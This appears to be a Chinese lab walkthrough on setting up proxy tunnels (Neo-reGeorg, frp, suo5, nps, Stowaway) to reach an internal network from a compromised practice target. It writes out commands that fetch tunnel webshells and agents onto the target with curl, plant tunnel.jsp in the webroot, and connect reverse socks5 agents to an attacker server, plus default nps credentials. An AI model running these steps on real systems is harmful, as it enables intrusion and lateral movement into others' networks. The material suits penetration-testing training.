我们使用春秋云境的靶场进行练习隧道搭建

Neo-reGeorg

这是一个正向代理工具

下载链接:https://github.com/L-codes/Neo-reGeorg

他的用法如下:

1.生成自己的密码这个是固定的后面每次连接隧道文件都需要密码认证

python neoreg.py generate -k 123456

2.上传后门文件

根据网站的框架选择对应的隧道文件

我们目前使用的这个站是jsp的,那我们选用

curl -k -O http://xx.xxx.xx.xxx/tunnel.jspx
chmod 777 tunnel*

我们使用curl大法从服务器上拉去一下隧道然后移到我们的web目录下

mv tunnel.jsp ./webapps/ROOT/tunnel.jsp

3.搭建隧道

首先需要先设置代理因为Neo-reGeorg走的是127.0.0.1的1080的socks5

然后执行如下即可

python neoreg.py -k 123456 -u https://eci-2ze1yf79w9ccjblzqf2t.cloudeci1.ichunqiu.com:8080/tunnel.jsp

frp

这个是个反向代理当然是服务器距离靶机越近越稳定

下载链接:https://github.com/fatedier/frp/releases/tag/v0.51.2

根据需要下载适配的frp即可

curl -k -O http://xx.xxx.xx.xxx/frpc.ini
curl -k -O http://xx.xxx.xx.xxx/frpc
chmod 777 frpc*

frps放在自己服务器上

frps.ini配置如下

[common]
bind_port = 6890

frpc放在靶机上
frpc.ini配置如下

# frpc.ini
[common]
tls_enable = true
server_addr = xx.xxx.xx.xxx
# 自己服务器的IP
server_port = 6890
 
[plugin_socks5]
type = tcp
remote_port = 5001

然后代理挂如下配置

服务器上如下执行

靶机上如下执行

成功挂上了,现在可以成功访问内网了

记得本地要访问内网要挂sock5到服务器的5001端口

SUO5

这个是Neo-reGeorg的超级进化版

下载链接:https://github.com/zema1/suo5

1.把suo5.jsp文件上传到靶机shell

curl -k -O http://xx.xxx.xx.xxx/suo5.jsp

访问一下

开启window的GUI

直接连接即可访问内网

nps

下载链接:

https://github.com/ehang-io/nps

下载好之后

双击exe文件然后访问127.0.0.1的8080端口就可以访问到管理后台了,当然我们这个要在一个纯净的服务器上搭建才行,就是访问VPSIP:8080

默认登录用户名密码为admin:123

我们在web端添加一个客户端,啥也不用写直接添加

然后设置sock5:注意保证id和见面的客户端一样

我们如上设置好后我们只需要在靶机上传对应系统的npc就行

linux执行:nohup ./npc -server=160.30.231.226:8024 -vkey=piv873ad0iwe3nuo -type=tcp &

win执行:npc.exe -server=vps:18024 -vkey=piv873ad0iwe3nuo -type=tcp


最后我们本地进内网就是挂代理到服务器的10090端口的sock5即可

p2ptunnel+iox(TCP,UDP)

下载链接:https://github.com/chenjia404/p2ptunnel

具体用法参考readme

README.zh-CN.md

Stowaway

https://github.com/ph4ntonn/Stowaway

应该下载这些就行了,中间的传输大家自己来就行scp就能传

控制端运行:

./linux_x64_admin -l 1234 -s 123

VPS1 出网靶机运行:

./linux_x64_agent -c 控制端ip:1234 -s 123 --reconnect 8

建立连接后在控制端运行:

use 0
listen
1
1234

然后用VPS2内网不出网靶机连接VPS1的1234端口

./linux_x64_agent -c VPS1:1234 -s 123 --reconnect 8

过一会儿会在控制端看见新节点node 1加入,这个就是经过VPS1代理的VPS2,先back,选择use 1,socks 9384,就可以在9384建立对web3的多层代理,同时也不会影响之前在web1上建立的代理

然后我们用新代理在本地连postgresql

只需要改socks5就行了